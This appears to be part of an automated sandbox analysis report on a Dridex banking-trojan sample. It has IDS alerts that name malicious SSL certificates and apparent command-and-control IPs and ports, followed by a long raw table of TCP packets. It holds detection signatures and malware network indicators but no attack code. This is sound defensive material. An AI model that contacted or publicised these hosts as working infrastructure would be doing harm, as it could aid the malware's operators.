01/12/21-07:42:00.709693	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49403	80.86.91.27	192.168.2.22
01/12/21-07:42:01.219815	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49404	5.100.228.233	192.168.2.22
01/12/21-07:42:01.219815	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49404	5.100.228.233	192.168.2.22
01/12/21-07:42:02.247073	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49406	77.220.64.37	192.168.2.22
01/12/21-07:42:02.755637	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49407	80.86.91.27	192.168.2.22
01/12/21-07:42:03.281436	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49408	5.100.228.233	192.168.2.22
01/12/21-07:42:03.281436	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49408	5.100.228.233	192.168.2.22
01/12/21-07:42:04.306580	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49410	77.220.64.37	192.168.2.22
01/12/21-07:42:04.834674	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49411	80.86.91.27	192.168.2.22
01/12/21-07:42:05.352300	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49412	5.100.228.233	192.168.2.22
01/12/21-07:42:05.352300	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49412	5.100.228.233	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 07:39:44.707056999 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:44.757510900 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:44.757617950 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:44.770828962 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:44.821204901 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:44.823672056 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:44.823704958 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:44.823832989 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:44.833878040 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:44.884164095 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:44.884217024 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:44.884305000 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:45.110754967 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:45.161001921 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866411924 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866445065 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866467953 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866489887 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866514921 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866539001 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866561890 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866584063 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:45.866626024 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:45.868046045 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.032404900 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.032433033 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.032552958 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.032577991 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.032624006 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.033785105 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.033813000 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.033829927 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.033843994 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.033865929 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.034933090 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.034965038 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.035003901 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.035018921 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.036092043 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.036118031 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.036149025 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.036163092 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.037291050 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.037318945 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.037349939 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.037360907 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.038445950 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.038475037 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.038499117 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.038508892 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.039661884 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.039689064 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.039717913 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.039731026 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.040788889 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.040817022 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.040843964 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.041995049 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.042027950 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.042037964 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.042049885 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.042066097 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.200309038 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.200340033 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.200469017 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.200494051 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.200530052 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.200572014 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.201702118 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.201731920 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.201927900 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.202847004 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.202879906 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.202986956 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.204013109 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.204041004 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.204138041 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.205204964 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.205235004 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.205296993 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.206374884 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.206408024 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.206459999 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.207567930 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.207600117 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.207640886 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.208791018 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.208820105 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.208929062 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.209887028 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.209913015 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.210000038 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.367963076 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.367995977 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.368151903 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.368413925 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.368429899 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.368470907 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.369112015 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.369132042 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.369163990 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.369175911 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.370287895 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.370307922 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.370372057 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.371470928 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.371490955 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.371551991 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.372649908 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.372669935 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.372728109 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.372740984 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.373848915 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.373871088 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.373924017 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.375008106 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.375029087 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.375071049 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.376123905 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.376221895 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.376240015 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.376274109 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.376282930 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.377346992 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.377367973 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.377413988 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.377429962 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.378530025 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.378551960 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.378597975 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.378617048 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.379734993 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.379756927 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.379802942 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.379816055 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.380902052 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.380918980 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.380969048 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.535893917 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.535924911 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.536191940 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.536382914 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.536401033 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.536465883 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.537265062 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.537292004 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.537345886 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.537374973 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.538211107 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.538239002 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.538275957 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.538295984 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.539378881 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.539405107 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.539483070 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.540574074 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.540599108 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.540726900 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.541738033 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.541763067 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.541825056 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.542958975 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.542982101 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.543037891 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.544080019 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.544105053 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.544152021 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.544970989 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.545241117 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.545265913 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.545320034 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.545351982 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.546458006 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.546475887 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.546541929 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.547610998 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.547631979 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.547684908 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.548814058 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.548831940 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.548907995 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.549971104 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.549993038 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.550050974 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.550590038 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.551126003 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.551147938 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.551220894 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.552306890 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.552333117 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.552388906 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.552412033 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.552742004 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.555367947 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.555389881 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.555402994 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.555414915 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.555491924 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.555825949 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.555843115 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.555906057 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.557019949 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.557038069 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.557199001 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.558162928 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.558181047 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.558263063 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.561585903 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.561606884 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.561624050 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.561651945 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.561734915 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.561734915 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.561752081 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.561758995 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.561866045 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.562845945 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.562872887 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.562889099 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.562942982 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.563656092 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.568120003 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.714531898 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.714560032 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.714792013 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.718103886 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.718130112 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.718295097 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.720036983 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720210075 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.720599890 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720686913 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720702887 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.720726013 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720773935 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720774889 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.720818043 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720839024 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.720877886 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720884085 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.720936060 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.720942020 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720987082 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.720998049 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.721038103 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.721041918 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.721080065 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.721112013 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.721134901 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.721141100 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.721191883 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.721591949 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.725263119 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.725364923 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.725523949 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.725593090 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.725596905 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.725651979 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.725662947 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.725717068 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.725720882 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.725771904 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.725785017 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.725838900 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.726874113 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.726943970 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.726965904 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.727032900 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.727612972 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.727675915 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.727691889 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.727737904 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.727921009 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.728785992 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.728854895 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.728872061 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.728919983 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.729821920 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.729912996 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.729913950 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.729969978 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.730827093 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.730901957 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.730909109 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.730956078 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.731976032 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.732045889 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.732053995 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.732115030 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.733133078 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.733202934 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.733228922 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.733270884 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.734164953 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.734273911 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.734280109 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.734338045 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.734591007 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.734652996 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.734662056 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.734711885 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.735119104 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.735178947 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.735199928 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.735222101 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.736232996 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.736270905 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.736330986 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.737337112 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.738986015 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.739018917 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.739044905 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.739069939 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.739073038 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.739095926 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.739099026 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.739101887 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.739475965 CET	443	49165	104.27.153.52	192.168.2.22
